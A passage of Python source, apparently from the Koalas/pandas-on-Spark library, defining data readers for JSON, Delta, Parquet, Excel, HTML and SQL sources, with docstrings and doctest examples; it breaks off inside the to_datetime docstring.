column_labels = OrderedDict(
(label, col) for label, col in column_labels.items() if label not in index_col
)
else:
index_spark_column_names = []
index_names = []
kdf = DataFrame(
InternalFrame(
spark_frame=sdf,
index_spark_columns=[scol_for(sdf, col) for col in index_spark_column_names],
index_names=index_names,
column_labels=[
label if is_name_like_tuple(label) else (label,) for label in column_labels
],
data_spark_columns=[scol_for(sdf, col) for col in column_labels.values()],
)
) # type: DataFrame
if dtype is not None:
if isinstance(dtype, dict):
for col, tpe in dtype.items():
kdf[col] = kdf[col].astype(tpe)
else:
for col in kdf.columns:
kdf[col] = kdf[col].astype(dtype)
if squeeze and len(kdf.columns) == 1:
return first_series(kdf)
else:
return kdf
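# Hedged usage sketch (hypothetical path and schema, not part of the module): passing a
# DDL-formatted schema string via `names` skips schema inference, and `index_col`
# promotes a column to the index.
def _example_read_csv_sketch():
    return read_csv(
        "/tmp/example.csv",            # hypothetical path
        names="id long, name string",  # DDL string, as recommended in the docstring above
        index_col="id",
    )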
def read_json(
path: str, lines: bool = True, index_col: Optional[Union[str, List[str]]] = None, **options
) -> DataFrame:
"""
Convert a JSON string to DataFrame.
Parameters
----------
path : string
File path
lines : bool, default True
Read the file as a json object per line. It should be always True for now.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
options : dict
All other options passed directly into Spark's data source.
Examples
--------
>>> df = pp.DataFrame([['a', 'b'], ['c', 'd']],
... columns=['col 1', 'col 2'])
>>> df.to_json(path=r'%s/read_json/foo.json' % path, num_files=1)
>>> pp.read_json(
... path=r'%s/read_json/foo.json' % path
... ).sort_values(by="col 1")
col 1 col 2
0 a b
1 c d
>>> df.to_json(path=r'%s/read_json/foo.json' % path, num_files=1, lineSep='___')
>>> pp.read_json(
... path=r'%s/read_json/foo.json' % path, lineSep='___'
... ).sort_values(by="col 1")
col 1 col 2
0 a b
1 c d
You can preserve the index in the roundtrip as below.
>>> df.to_json(path=r'%s/read_json/bar.json' % path, num_files=1, index_col="index")
>>> pp.read_json(
... path=r'%s/read_json/bar.json' % path, index_col="index"
... ).sort_values(by="col 1") # doctest: +NORMALIZE_WHITESPACE
col 1 col 2
index
0 a b
1 c d
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
if not lines:
raise NotImplementedError("lines=False is not implemented yet.")
return read_spark_io(path, format="json", index_col=index_col, **options)
def read_delta(
path: str,
version: Optional[str] = None,
timestamp: Optional[str] = None,
index_col: Optional[Union[str, List[str]]] = None,
**options
) -> DataFrame:
"""
Read a Delta Lake table on some file system and return a DataFrame.
If the Delta Lake table is already stored in the catalog (aka the metastore), use 'read_table'.
Parameters
----------
path : string
Path to the Delta Lake table.
version : string, optional
Specifies the table version (based on Delta's internal transaction version) to read from,
using Delta's time travel feature. This sets Delta's 'versionAsOf' option.
timestamp : string, optional
Specifies the table version (based on timestamp) to read from,
using Delta's time travel feature. This must be a valid date or timestamp string in Spark,
and sets Delta's 'timestampAsOf' option.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
options
Additional options that can be passed onto Delta.
Returns
-------
DataFrame
See Also
--------
DataFrame.to_delta
read_table
read_spark_io
read_parquet
Examples
--------
>>> pp.range(1).to_delta('%s/read_delta/foo' % path) # doctest: +SKIP
>>> pp.read_delta('%s/read_delta/foo' % path) # doctest: +SKIP
id
0 0
>>> pp.range(10, 15, num_partitions=1).to_delta('%s/read_delta/foo' % path,
... mode='overwrite') # doctest: +SKIP
>>> pp.read_delta('%s/read_delta/foo' % path) # doctest: +SKIP
id
0 10
1 11
2 12
3 13
4 14
>>> pp.read_delta('%s/read_delta/foo' % path, version=0) # doctest: +SKIP
id
0 0
You can preserve the index in the roundtrip as below.
>>> pp.range(10, 15, num_partitions=1).to_delta(
... '%s/read_delta/bar' % path, index_col="index") # doctest: +SKIP
>>> pp.read_delta('%s/read_delta/bar' % path, index_col="index") # doctest: +SKIP
id
index
0 10
1 11
2 12
3 13
4 14
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
if version is not None:
options["versionAsOf"] = version
if timestamp is not None:
options["timestampAsOf"] = timestamp
return read_spark_io(path, format="delta", index_col=index_col, **options)
def read_table(name: str, index_col: Optional[Union[str, List[str]]] = None) -> DataFrame:
"""
Read a Spark table and return a DataFrame.
Parameters
----------
name : string
Table name in Spark.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
Returns
-------
DataFrame
See Also
--------
DataFrame.to_table
read_delta
read_parquet
read_spark_io
Examples
--------
>>> pp.range(1).to_table('%s.my_table' % db)
>>> pp.read_table('%s.my_table' % db)
id
0 0
>>> pp.range(1).to_table('%s.my_table' % db, index_col="index")
>>> pp.read_table('%s.my_table' % db, index_col="index") # doctest: +NORMALIZE_WHITESPACE
id
index
0 0
"""
sdf = default_session().read.table(name)
index_spark_columns, index_names = _get_index_map(sdf, index_col)
return DataFrame(
InternalFrame(
spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names
)
)
def read_spark_io(
path: Optional[str] = None,
format: Optional[str] = None,
schema: Union[str, "StructType"] = None,
index_col: Optional[Union[str, List[str]]] = None,
**options
) -> DataFrame:
"""Load a DataFrame from a Spark data source.
Parameters
----------
path : string, optional
Path to the data source.
format : string, optional
Specifies the output data source format. Some common ones are:
- 'delta'
- 'parquet'
- 'orc'
- 'json'
- 'csv'
schema : string or StructType, optional
Input schema. If none, Spark tries to infer the schema automatically.
The schema can either be a Spark StructType, or a DDL-formatted string like
`col0 INT, col1 DOUBLE`.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
options : dict
All other options passed directly into Spark's data source.
See Also
--------
DataFrame.to_spark_io
DataFrame.read_table
DataFrame.read_delta
DataFrame.read_parquet
Examples
--------
>>> pp.range(1).to_spark_io('%s/read_spark_io/data.parquet' % path)
>>> pp.read_spark_io(
... '%s/read_spark_io/data.parquet' % path, format='parquet', schema='id long')
id
0 0
>>> pp.range(10, 15, num_partitions=1).to_spark_io('%s/read_spark_io/data.json' % path,
... format='json', lineSep='__')
>>> pp.read_spark_io(
... '%s/read_spark_io/data.json' % path, format='json', schema='id long', lineSep='__')
id
0 10
1 11
2 12
3 13
4 14
You can preserve the index in the roundtrip as below.
>>> pp.range(10, 15, num_partitions=1).to_spark_io('%s/read_spark_io/data.orc' % path,
... format='orc', index_col="index")
>>> pp.read_spark_io(
... path=r'%s/read_spark_io/data.orc' % path, format="orc", index_col="index")
... # doctest: +NORMALIZE_WHITESPACE
id
index
0 10
1 11
2 12
3 13
4 14
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
sdf = default_session().read.load(path=path, format=format, schema=schema, **options)
index_spark_columns, index_names = _get_index_map(sdf, index_col)
return DataFrame(
InternalFrame(
spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names
)
)
def read_parquet(path, columns=None, index_col=None, pandas_metadata=False, **options) -> DataFrame:
"""Load a parquet object from the file path, returning a DataFrame.
Parameters
----------
path : string
File path
columns : list, default=None
If not None, only these columns will be read from the file.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
pandas_metadata : bool, default: False
If True, try to respect the metadata if the Parquet file is written from pandas.
options : dict
All other options passed directly into Spark's data source.
Returns
-------
DataFrame
See Also
--------
DataFrame.to_parquet
DataFrame.read_table
DataFrame.read_delta
DataFrame.read_spark_io
Examples
--------
>>> pp.range(1).to_parquet('%s/read_spark_io/data.parquet' % path)
>>> pp.read_parquet('%s/read_spark_io/data.parquet' % path, columns=['id'])
id
0 0
You can preserve the index in the roundtrip as below.
>>> pp.range(1).to_parquet('%s/read_spark_io/data.parquet' % path, index_col="index")
>>> pp.read_parquet('%s/read_spark_io/data.parquet' % path, columns=['id'], index_col="index")
... # doctest: +NORMALIZE_WHITESPACE
id
index
0 0
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
if columns is not None:
columns = list(columns)
index_names = None
if index_col is None and pandas_metadata:
if LooseVersion(pyspark.__version__) < LooseVersion("3.0.0"):
raise ValueError("pandas_metadata is not supported with Spark < 3.0.")
# Try to read pandas metadata
@pandas_udf("index_col array<string>, index_names array<string>", PandasUDFType.SCALAR)
def read_index_metadata(pser):
binary = pser.iloc[0]
metadata = pq.ParquetFile(pa.BufferReader(binary)).metadata.metadata
if b"pandas" in metadata:
pandas_metadata = json.loads(metadata[b"pandas"].decode("utf8"))
if all(isinstance(col, str) for col in pandas_metadata["index_columns"]):
index_col = []
index_names = []
for col in pandas_metadata["index_columns"]:
index_col.append(col)
for column in pandas_metadata["columns"]:
if column["field_name"] == col:
index_names.append(column["name"])
break
else:
index_names.append(None)
return pd.DataFrame({"index_col": [index_col], "index_names": [index_names]})
return pd.DataFrame({"index_col": [None], "index_names": [None]})
index_col, index_names = (
default_session()
.read.format("binaryFile")
.load(path)
.limit(1)
.select(read_index_metadata("content").alias("index_metadata"))
.select("index_metadata.*")
.head()
)
kdf = read_spark_io(path=path, format="parquet", options=options, index_col=index_col)
if columns is not None:
new_columns = [c for c in columns if c in kdf.columns]
if len(new_columns) > 0:
kdf = kdf[new_columns]
else:
sdf = default_session().createDataFrame([], schema=StructType())
index_spark_columns, index_names = _get_index_map(sdf, index_col)
kdf = DataFrame(
InternalFrame(
spark_frame=sdf,
index_spark_columns=index_spark_columns,
index_names=index_names,
)
)
if index_names is not None:
kdf.index.names = index_names
return kdf
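# Hedged usage sketch (hypothetical path, not part of the module): write with an index
# column and read it back with the same index_col to restore the index. Note that
# `range` here is the Koalas range() defined earlier in this module, not the built-in.
def _example_read_parquet_sketch():
    range(3).to_parquet("/tmp/example_parquet", index_col="index")
    return read_parquet("/tmp/example_parquet", columns=["id"], index_col="index")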
def read_clipboard(sep=r"\s+", **kwargs) -> DataFrame:
r"""
Read text from clipboard and pass to read_csv. See read_csv for the
full argument list
Parameters
----------
sep : str, default '\s+'
A string or regex delimiter. The default of '\s+' denotes
one or more whitespace characters.
See Also
--------
DataFrame.to_clipboard : Write text out to clipboard.
Returns
-------
parsed : DataFrame
"""
return cast(DataFrame, from_pandas(pd.read_clipboard(sep, **kwargs)))
def read_excel(
io,
sheet_name=0,
header=0,
names=None,
index_col=None,
usecols=None,
squeeze=False,
dtype=None,
engine=None,
converters=None,
true_values=None,
false_values=None,
skiprows=None,
nrows=None,
na_values=None,
keep_default_na=True,
verbose=False,
parse_dates=False,
date_parser=None,
thousands=None,
comment=None,
skipfooter=0,
convert_float=True,
mangle_dupe_cols=True,
**kwds
) -> Union[DataFrame, Series, OrderedDict]:
"""
Read an Excel file into a Koalas DataFrame or Series.
Support both `xls` and `xlsx` file extensions from a local filesystem or URL.
Support an option to read a single sheet or a list of sheets.
Parameters
----------
io : str, file descriptor, pathlib.Path, ExcelFile or xlrd.Book
The string could be a URL. The value URL must be available in Spark's DataFrameReader.
.. note::
If the underlying Spark is below 3.0, the parameter as a string is not supported.
You can use `pp.from_pandas(pd.read_excel(...))` as a workaround.
sheet_name : str, int, list, or None, default 0
Strings are used for sheet names. Integers are used in zero-indexed
sheet positions. Lists of strings/integers are used to request
multiple sheets. Specify None to get all sheets.
Available cases:
* Defaults to ``0``: 1st sheet as a `DataFrame`
* ``1``: 2nd sheet as a `DataFrame`
* ``"Sheet1"``: Load sheet with name "Sheet1"
* ``[0, 1, "Sheet5"]``: Load first, second and sheet named "Sheet5"
as a dict of `DataFrame`
* None: All sheets.
header : int, list of int, default 0
Row (0-indexed) to use for the column labels of the parsed
DataFrame. If a list of integers is passed those row positions will
be combined into a ``MultiIndex``. Use None if there is no header.
names : array-like, default None
List of column names to use. If file contains no header row,
then you should explicitly pass header=None.
index_col : int, list of int, default None
Column (0-indexed) to use as the row labels of the DataFrame.
Pass None if there is no such column. If a list is passed,
those columns will be combined into a ``MultiIndex``. If a
subset of data is selected with ``usecols``, index_col
is based on the subset.
usecols : int, str, list-like, or callable default None
Return a subset of the columns.
* If None, then parse all columns.
* If str, then indicates comma separated list of Excel column letters
and column ranges (e.g. "A:E" or "A,C,E:F"). Ranges are inclusive of
both sides.
* If list of int, then indicates list of column numbers to be parsed.
* If list of string, then indicates list of column names to be parsed.
* If callable, then evaluate each column name against it and parse the
column if the callable returns ``True``.
squeeze : bool, default False
If the parsed data only contains one column then return a Series.
dtype : Type name or dict of column -> type, default None
Data type for data or columns. E.g. {'a': np.float64, 'b': np.int32}
Use `object` to preserve data as stored in Excel and not interpret dtype.
If converters are specified, they will be applied INSTEAD
of dtype conversion.
engine : str, default None
If io is not a buffer or path, this must be set to identify io.
Acceptable values are None or xlrd.
converters : dict, default None
Dict of functions for converting values in certain columns. Keys can
either be integers or column labels, values are functions that take one
input argument, the Excel cell content, and return the transformed
content.
true_values : list, default None
Values to consider as True.
false_values : list, default None
Values to consider as False.
skiprows : list-like
Rows to skip at the beginning (0-indexed).
nrows : int, default None
Number of rows to parse.
na_values : scalar, str, list-like, or dict, default None
Additional strings to recognize as NA/NaN. If dict passed, specific
per-column NA values. By default the following values are interpreted
as NaN.
keep_default_na : bool, default True
If na_values are specified and keep_default_na is False the default NaN
values are overridden, otherwise they're appended to.
verbose : bool, default False
Indicate number of NA values placed in non-numeric columns.
parse_dates : bool, list-like, or dict, default False
The behavior is as follows:
* bool. If True -> try parsing the index.
* list of int or names. e.g. If [1, 2, 3] -> try parsing columns 1, 2, 3
each as a separate date column.
* list of lists. e.g. If [[1, 3]] -> combine columns 1 and 3 and parse as
a single date column.
* dict, e.g. {{'foo' : [1, 3]}} -> parse columns 1, 3 as date and call
result 'foo'
If a column or index contains an unparseable date, the entire column or
index will be returned unaltered as an object data type. For non-standard
datetime parsing, use ``pd.to_datetime`` after ``pd.read_csv``
Note: A fast-path exists for iso8601-formatted dates.
date_parser : function, optional
Function to use for converting a sequence of string columns to an array of
datetime instances. The default uses ``dateutil.parser.parser`` to do the
conversion. Koalas will try to call `date_parser` in three different ways,
advancing to the next if an exception occurs: 1) Pass one or more arrays
(as defined by `parse_dates`) as arguments; 2) concatenate (row-wise) the
string values from the columns defined by `parse_dates` into a single array
and pass that; and 3) call `date_parser` once for each row using one or
more strings (corresponding to the columns defined by `parse_dates`) as
arguments.
thousands : str, default None
Thousands separator for parsing string columns to numeric. Note that
this parameter is only necessary for columns stored as TEXT in Excel,
any numeric columns will automatically be parsed, regardless of display
format.
comment : str, default None
Comments out remainder of line. Pass a character or characters to this
argument to indicate comments in the input file. Any data between the
comment string and the end of the current line is ignored.
skipfooter : int, default 0
Rows at the end to skip (0-indexed).
convert_float : bool, default True
Convert integral floats to int (i.e., 1.0 --> 1). If False, all numeric
data will be read in as floats: Excel stores all numbers as floats
internally.
mangle_dupe_cols : bool, default True
Duplicate columns will be specified as 'X', 'X.1', ...'X.N', rather than
'X'...'X'. Passing in False will cause data to be overwritten if there
are duplicate names in the columns.
**kwds : optional
Optional keyword arguments can be passed to ``TextFileReader``.
Returns
-------
DataFrame or dict of DataFrames
DataFrame from the passed in Excel file. See notes in sheet_name
argument for more information on when a dict of DataFrames is returned.
See Also
--------
DataFrame.to_excel : Write DataFrame to an Excel file.
DataFrame.to_csv : Write DataFrame to a comma-separated values (csv) file.
read_csv : Read a comma-separated values (csv) file into DataFrame.
Examples
--------
The file can be read using the file name as string or an open file object:
>>> pp.read_excel('tmp.xlsx', index_col=0) # doctest: +SKIP
Name Value
0 string1 1
1 string2 2
2 #Comment 3
>>> pp.read_excel(open('tmp.xlsx', 'rb'),
... sheet_name='Sheet3') # doctest: +SKIP
Unnamed: 0 Name Value
0 0 string1 1
1 1 string2 2
2 2 #Comment 3
Index and header can be specified via the `index_col` and `header` arguments
>>> pp.read_excel('tmp.xlsx', index_col=None, header=None) # doctest: +SKIP
0 1 2
0 NaN Name Value
1 0.0 string1 1
2 1.0 string2 2
3 2.0 #Comment 3
Column types are inferred but can be explicitly specified
>>> pp.read_excel('tmp.xlsx', index_col=0,
... dtype={'Name': str, 'Value': float}) # doctest: +SKIP
Name Value
0 string1 1.0
1 string2 2.0
2 #Comment 3.0
True, False, and NA values, and thousands separators have defaults,
but can be explicitly specified, too. Supply the values you would like
as strings or lists of strings!
>>> pp.read_excel('tmp.xlsx', index_col=0,
... na_values=['string1', 'string2']) # doctest: +SKIP
Name Value
0 None 1
1 None 2
2 #Comment 3
Comment lines in the excel input file can be skipped using the `comment` kwarg
>>> pp.read_excel('tmp.xlsx', index_col=0, comment='#') # doctest: +SKIP
Name Value
0 string1 1.0
1 string2 2.0
2 None NaN
"""
def pd_read_excel(io_or_bin, sn, sq):
return pd.read_excel(
io=BytesIO(io_or_bin) if isinstance(io_or_bin, (bytes, bytearray)) else io_or_bin,
sheet_name=sn,
header=header,
names=names,
index_col=index_col,
usecols=usecols,
squeeze=sq,
dtype=dtype,
engine=engine,
converters=converters,
true_values=true_values,
false_values=false_values,
skiprows=skiprows,
nrows=nrows,
na_values=na_values,
keep_default_na=keep_default_na,
verbose=verbose,
parse_dates=parse_dates,
date_parser=date_parser,
thousands=thousands,
comment=comment,
skipfooter=skipfooter,
convert_float=convert_float,
mangle_dupe_cols=mangle_dupe_cols,
**kwds
)
if isinstance(io, str):
if LooseVersion(pyspark.__version__) < LooseVersion("3.0.0"):
raise ValueError(
"The `io` parameter as a string is not supported if the underlying Spark is "
"below 3.0. You can use `pp.from_pandas(pd.read_excel(...))` as a workaround"
)
# 'binaryFile' format is available since Spark 3.0.0.
binaries = default_session().read.format("binaryFile").load(io).select("content").head(2)
io_or_bin = binaries[0][0]
single_file = len(binaries) == 1
else:
io_or_bin = io
single_file = True
pdf_or_psers = pd_read_excel(io_or_bin, sn=sheet_name, sq=squeeze)
if single_file:
if isinstance(pdf_or_psers, dict):
return OrderedDict(
[(sn, from_pandas(pdf_or_pser)) for sn, pdf_or_pser in pdf_or_psers.items()]
)
else:
return cast(Union[DataFrame, Series], from_pandas(pdf_or_psers))
else:
def read_excel_on_spark(pdf_or_pser, sn):
if isinstance(pdf_or_pser, pd.Series):
pdf = pdf_or_pser.to_frame()
else:
pdf = pdf_or_pser
kdf = from_pandas(pdf)
return_schema = force_decimal_precision_scale(
as_nullable_spark_type(kdf._internal.spark_frame.drop(*HIDDEN_COLUMNS).schema)
)
def output_func(pdf):
pdf = pd.concat(
[pd_read_excel(bin, sn=sn, sq=False) for bin in pdf[pdf.columns[0]]]
)
reset_index = pdf.reset_index()
for name, col in reset_index.iteritems():
dt = col.dtype
if is_datetime64_dtype(dt) or is_datetime64tz_dtype(dt):
continue
reset_index[name] = col.replace({np.nan: None})
pdf = reset_index
# Just positionally map the column names to given schema's.
return pdf.rename(columns=dict(zip(pdf.columns, return_schema.names)))
sdf = (
default_session()
.read.format("binaryFile")
.load(io)
.select("content")
.mapInPandas(lambda iterator: map(output_func, iterator), schema=return_schema)
)
kdf = DataFrame(kdf._internal.with_new_sdf(sdf))
if squeeze and len(kdf.columns) == 1:
return first_series(kdf)
else:
return kdf
if isinstance(pdf_or_psers, dict):
return OrderedDict(
[
(sn, read_excel_on_spark(pdf_or_pser, sn))
for sn, pdf_or_pser in pdf_or_psers.items()
]
)
else:
return read_excel_on_spark(pdf_or_psers, sheet_name)
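# Hedged usage sketch (hypothetical workbook path, not part of the module): passing a
# list of sheet names returns an OrderedDict of DataFrames keyed by sheet name, as the
# docstring above describes.
def _example_read_excel_sketch():
    sheets = read_excel("/tmp/example.xlsx", sheet_name=["Sheet1", "Sheet2"], index_col=0)
    return {name: frame.columns for name, frame in sheets.items()}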
def read_html(
io,
match=".+",
flavor=None,
header=None,
index_col=None,
skiprows=None,
attrs=None,
parse_dates=False,
thousands=",",
encoding=None,
decimal=".",
converters=None,
na_values=None,
keep_default_na=True,
displayed_only=True,
) -> List[DataFrame]:
r"""Read HTML tables into a ``list`` of ``DataFrame`` objects.
Parameters
----------
io : str or file-like
A URL, a file-like object, or a raw string containing HTML. Note that
lxml only accepts the http, ftp and file url protocols. If you have a
URL that starts with ``'https'`` you might try removing the ``'s'``.
match : str or compiled regular expression, optional
The set of tables containing text matching this regex or string will be
returned. Unless the HTML is extremely simple you will probably need to
pass a non-empty string here. Defaults to '.+' (match any non-empty
string). The default value will return all tables contained on a page.
This value is converted to a regular expression so that there is
consistent behavior between Beautiful Soup and lxml.
flavor : str or None, container of strings
The parsing engine to use. 'bs4' and 'html5lib' are synonymous with
each other, they are both there for backwards compatibility. The
default of ``None`` tries to use ``lxml`` to parse and if that fails it
falls back on ``bs4`` + ``html5lib``.
header : int or list-like or None, optional
The row (or list of rows for a :class:`~pp.MultiIndex`) to use to
make the columns headers.
index_col : int or list-like or None, optional
The column (or list of columns) to use to create the index.
skiprows : int or list-like or slice or None, optional
0-based. Number of rows to skip after parsing the column integer. If a
sequence of integers or a slice is given, will skip the rows indexed by
that sequence. Note that a single element sequence means 'skip the nth
row' whereas an integer means 'skip n rows'.
attrs : dict or None, optional
This is a dictionary of attributes that you can pass to use to identify
the table in the HTML. These are not checked for validity before being
passed to lxml or Beautiful Soup. However, these attributes must be
valid HTML table attributes to work correctly. For example, ::
attrs = {'id': 'table'}
is a valid attribute dictionary because the 'id' HTML tag attribute is
a valid HTML attribute for *any* HTML tag as per `this document
<http://www.w3.org/TR/html-markup/global-attributes.html>`__. ::
attrs = {'asdf': 'table'}
is *not* a valid attribute dictionary because 'asdf' is not a valid
HTML attribute even if it is a valid XML attribute. Valid HTML 4.01
table attributes can be found `here
<http://www.w3.org/TR/REC-html40/struct/tables.html#h-11.2>`__. A
working draft of the HTML 5 spec can be found `here
<http://www.w3.org/TR/html-markup/table.html>`__. It contains the
latest information on table attributes for the modern web.
parse_dates : bool, optional
See :func:`~pp.read_csv` for more details.
thousands : str, optional
Separator to use to parse thousands. Defaults to ``','``.
encoding : str or None, optional
        The encoding used to decode the web page. Defaults to ``None``. ``None``
preserves the previous encoding behavior, which depends on the
underlying parser library (e.g., the parser library will try to use
the encoding provided by the document).
decimal : str, default '.'
Character to recognize as decimal point (e.g. use ',' for European
data).
converters : dict, default None
Dict of functions for converting values in certain columns. Keys can
either be integers or column labels, values are functions that take one
input argument, the cell (not column) content, and return the
transformed content.
na_values : iterable, default None
Custom NA values
keep_default_na : bool, default True
If na_values are specified and keep_default_na is False the default NaN
values are overridden, otherwise they're appended to
displayed_only : bool, default True
Whether elements with "display: none" should be parsed
Returns
-------
dfs : list of DataFrames
See Also
--------
read_csv
DataFrame.to_html
"""
pdfs = pd.read_html(
io=io,
match=match,
flavor=flavor,
header=header,
index_col=index_col,
skiprows=skiprows,
attrs=attrs,
parse_dates=parse_dates,
thousands=thousands,
encoding=encoding,
decimal=decimal,
converters=converters,
na_values=na_values,
keep_default_na=keep_default_na,
displayed_only=displayed_only,
)
return cast(List[DataFrame], [from_pandas(pdf) for pdf in pdfs])
# TODO: add `coerce_float` and 'parse_dates' parameters
def read_sql_table(
table_name, con, schema=None, index_col=None, columns=None, **options
) -> DataFrame:
"""
Read SQL database table into a DataFrame.
Given a table name and a JDBC URI, returns a DataFrame.
Parameters
----------
table_name : str
Name of SQL table in database.
con : str
        A JDBC URI could be provided as a str.
.. note:: The URI must be JDBC URI instead of Python's database URI.
schema : str, default None
Name of SQL schema in database to query (if database flavor
supports this). Uses default schema if None (default).
index_col : str or list of str, optional, default: None
Column(s) to set as index(MultiIndex).
columns : list, default None
List of column names to select from SQL table.
options : dict
All other options passed directly into Spark's JDBC data source.
Returns
-------
DataFrame
A SQL table is returned as two-dimensional data structure with labeled
axes.
See Also
--------
read_sql_query : Read SQL query into a DataFrame.
read_sql : Read SQL query or database table into a DataFrame.
Examples
--------
>>> pp.read_sql_table('table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
reader = default_session().read
reader.option("dbtable", table_name)
reader.option("url", con)
if schema is not None:
reader.schema(schema)
reader.options(**options)
sdf = reader.format("jdbc").load()
index_spark_columns, index_names = _get_index_map(sdf, index_col)
kdf = DataFrame(
InternalFrame(
spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names
)
) # type: DataFrame
if columns is not None:
if isinstance(columns, str):
columns = [columns]
kdf = kdf[columns]
return kdf
# TODO: add `coerce_float`, `params`, and 'parse_dates' parameters
def read_sql_query(sql, con, index_col=None, **options) -> DataFrame:
"""Read SQL query into a DataFrame.
Returns a DataFrame corresponding to the result set of the query
string. Optionally provide an `index_col` parameter to use one of the
columns as the index, otherwise default index will be used.
    .. note:: Some databases might hit the Spark issue SPARK-27596.
Parameters
----------
sql : string SQL query
SQL query to be executed.
con : str
        A JDBC URI could be provided as a str.
.. note:: The URI must be JDBC URI instead of Python's database URI.
index_col : string or list of strings, optional, default: None
Column(s) to set as index(MultiIndex).
options : dict
All other options passed directly into Spark's JDBC data source.
Returns
-------
DataFrame
See Also
--------
read_sql_table : Read SQL database table into a DataFrame.
read_sql
Examples
--------
>>> pp.read_sql_query('SELECT * FROM table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
reader = default_session().read
reader.option("query", sql)
reader.option("url", con)
reader.options(**options)
sdf = reader.format("jdbc").load()
index_spark_columns, index_names = _get_index_map(sdf, index_col)
return DataFrame(
InternalFrame(
spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names
)
)
# TODO: add `coerce_float`, `params`, and 'parse_dates' parameters
def read_sql(sql, con, index_col=None, columns=None, **options) -> DataFrame:
"""
Read SQL query or database table into a DataFrame.
This function is a convenience wrapper around ``read_sql_table`` and
``read_sql_query`` (for backward compatibility). It will delegate
to the specific function depending on the provided input. A SQL query
will be routed to ``read_sql_query``, while a database table name will
be routed to ``read_sql_table``. Note that the delegated function might
have more specific notes about their functionality not listed here.
    .. note:: Some databases might hit the Spark issue SPARK-27596.
Parameters
----------
sql : string
SQL query to be executed or a table name.
con : str
        A JDBC URI could be provided as a str.
.. note:: The URI must be JDBC URI instead of Python's database URI.
index_col : string or list of strings, optional, default: None
Column(s) to set as index(MultiIndex).
columns : list, default: None
List of column names to select from SQL table (only used when reading
a table).
options : dict
All other options passed directly into Spark's JDBC data source.
Returns
-------
DataFrame
See Also
--------
read_sql_table : Read SQL database table into a DataFrame.
read_sql_query : Read SQL query into a DataFrame.
Examples
--------
>>> pp.read_sql('table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP
>>> pp.read_sql('SELECT * FROM table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
striped = sql.strip()
if " " not in striped: # TODO: identify the table name or not more precisely.
return read_sql_table(sql, con, index_col=index_col, columns=columns, **options)
else:
return read_sql_query(sql, con, index_col=index_col, **options)
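# Hedged usage sketch (placeholder JDBC URI, not part of the module): a bare table name
# is delegated to read_sql_table, while a string containing a space is treated as a
# query and delegated to read_sql_query.
def _example_read_sql_sketch():
    url = "jdbc:postgresql:db_name"
    by_table = read_sql("table_name", url)                # routed to read_sql_table
    by_query = read_sql("SELECT * FROM table_name", url)  # routed to read_sql_query
    return by_table, by_query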
def to_datetime(
arg, errors="raise", format=None, unit=None, infer_datetime_format=False, origin="unix"
):
"""
Convert argument to datetime.
Parameters
----------
arg : integer, float, string, datetime, list, tuple, 1-d array, Series
or DataFrame/dict-like
errors : {'ignore', 'raise', 'coerce'}, default 'raise'
- If 'raise', then invalid parsing will raise an exception
- If 'coerce', then invalid parsing will be set as NaT
- If 'ignore', then invalid parsing will return the input
format : string, default None
strftime to parse time, eg "%d/%m/%Y", note that "%f" will parse
all the way up to nanoseconds.
unit : string, default None
unit of the arg (D,s,ms,us,ns) denote the unit, which is an
integer or float number. This will be based off the origin.
Example, with unit='ms' and origin='unix' (the default), this
would calculate the number of milliseconds to the unix epoch start.
infer_datetime_format : boolean, default False
If True and no `format` is given, attempt to infer the format of the
datetime strings, and if it can be inferred, switch to a faster
method of parsing them. In some cases this can increase the parsing
speed by ~5-10x.
origin : scalar, default 'unix'
Define the reference date. The numeric values would be parsed as number
of units (defined by `unit`) since this reference date.
- If 'unix' (or POSIX) time; origin is set to 1970-01-01.
- If 'julian', unit must be 'D', and origin is set to beginning of
Julian Calendar. Julian day number 0 is assigned to the day starting
at noon on January 1, 4713 BC.
- If Timestamp convertible, origin is set to Timestamp identified by
origin.
Returns
-------
ret : datetime if parsing succeeded.
Return type depends on input:
- list-like: DatetimeIndex
- Series: Series of datetime64 dtype
- scalar: Timestamp
In case when it is not possible to return designated types (e.g. when
any element of input is before Timestamp.min or after Timestamp.max)
return will have datetime.datetime type (or corresponding
array/Series).
Examples
--------
Assembling a datetime from multiple columns of a DataFrame. The keys can be
common abbreviations like ['year', 'month', 'day', 'minute', 'second',
'ms', 'us', 'ns']) or plurals of the same
>>> df = pp.DataFrame({'year': [2015, 2016],
... 'month': [2, 3],
... 'day': [4, 5]})
>>> pp.to_datetime(df)
0 2015-02-04
1 2016-03-05
dtype: datetime64[ns]
If a date does not meet the `timestamp limitations
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html
#timeseries-timestamp-limits>`_, passing errors='ignore'
will return the original input instead of raising any exception.
Passing errors='coerce' will force an out-of-bounds date to NaT,
in addition to forcing non-dates (or non-parseable dates) to NaT.
>>> pp.to_datetime('13000101', format='%Y%m%d', errors='ignore')
datetime.datetime(1300, 1, 1, 0, 0)
>>> pp.to_datetime('13000101', format='%Y%m%d', errors='coerce')
NaT
Passing infer_datetime_format=True can often-times speedup a parsing
if its not an ISO8601 format exactly, but in a regular format.
>>> s = pp.Series(['3/11/2000', '3/12/2000', '3/13/2000'] * 1000)
>>> s.head()
0 3/11/2000
1 3/12/2000
2 3/13/2000
